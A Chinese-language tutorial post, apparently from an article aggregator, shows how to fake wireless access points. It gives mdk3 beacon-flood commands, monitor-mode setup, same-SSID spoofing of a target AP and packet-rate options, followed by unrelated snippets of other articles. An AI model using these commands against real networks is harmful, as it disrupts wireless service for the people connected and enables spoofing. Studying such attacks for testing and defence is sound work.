偽造無線AP的幾種方法

2021-06-29 12:29:59 字數 917 閱讀 3657

偽造ap攻擊的方法具體表現有很多,這裡演示偽造合法ap和惡意建立大量虛假ap訊號。

偽造大量虛假ap訊號:

如果目的是要干擾正常無線通訊,那麼無線黑客也可以通過建立大量虛假ap基站訊號來實現。

具體可以使用mdk3這款工具實現,kalilinux裡面可以通過無線網絡卡發射隨機偽造的ap訊號,並可以根據需要設定偽造的ap的工作頻道,一般設定為干擾目標ap的同一頻道。

具體命令如下:

mdk3   網絡卡  b   -g   -c   6  -h   7

引數解釋:

網絡卡:此處用於輸入當前的網絡卡的名稱,這裡是mon0

b:用於偽造啊p時使用的模式

-g:偽造成提供54m即滿足802.11g標準的無線網路。

-c:num針對的無線工作頻道,這裡是6.

-h:num用於提公升攻擊效率,不過只針對個別無線裝置有效,可以不使用該引數。

啟用網絡卡命令:ifconfig wlan0 down

iwconfig wlan0 mode monitor

ifconfig wlan0 up

airmon-ng start wlan0

對於在某一頻道正常工作的無線接入點,攻擊者除了可以傳送相同頻道外,甚至還可以傳送相同ssid的無線資料流量訊號,來擾亂連線該ap的無線客戶端的正常運作,具體命令如下:

mdk3  網絡卡  b   -n    tp-link   -g   -c    6

其中,-n  是ssid使用指定的ssid來替代隨機生成的ssid,該引數使得提供更有針對性。

提公升發包速度:

mdk3    網絡卡   b   -n   tp-link  -g   -c   6  -s 200

其中,-s為傳送資料報速率,但並不準確,這裡輸入的為200,實際發包速率會保持在150---250個包/秒

偽造無線AP熱點流程,DNS劫持

第二步 偽造ap 安裝無線網絡卡橋接包 apt get install bridge utils 新增網橋 brctl addbr bridge 先把連線網路的網絡卡新增到網橋裡面 brctl addif bridge eth0 eth0 是已經連線網路的網絡卡,可以是有線網絡卡或者無線網絡卡 把自...

TIdTCPClient的幾種方法

其實indy比較簡單,但是可以提供的方法太多了。我找了很久,才搞明白。比方說這個讀取緩衝區的資料,就有很多種方法。相對於ttcpclient的幾種方法來說,tidtcpclient確實提供了多種選擇,不仔細研究真的容易糊塗 其實我比較喜歡用currentreadbuffer 1 readfromst...

排序的幾種方法

三種排序 選擇排序,氣泡排序,插入排序 的總結 1.選擇排序 1 public class demo3 遍歷排序前的數值 for int i 0 i num.length 1 i 如果最小值的標號未改變,代表本身已是最小值,否則交換數值 if min i 遍歷排序後的數值 for int i 0 i...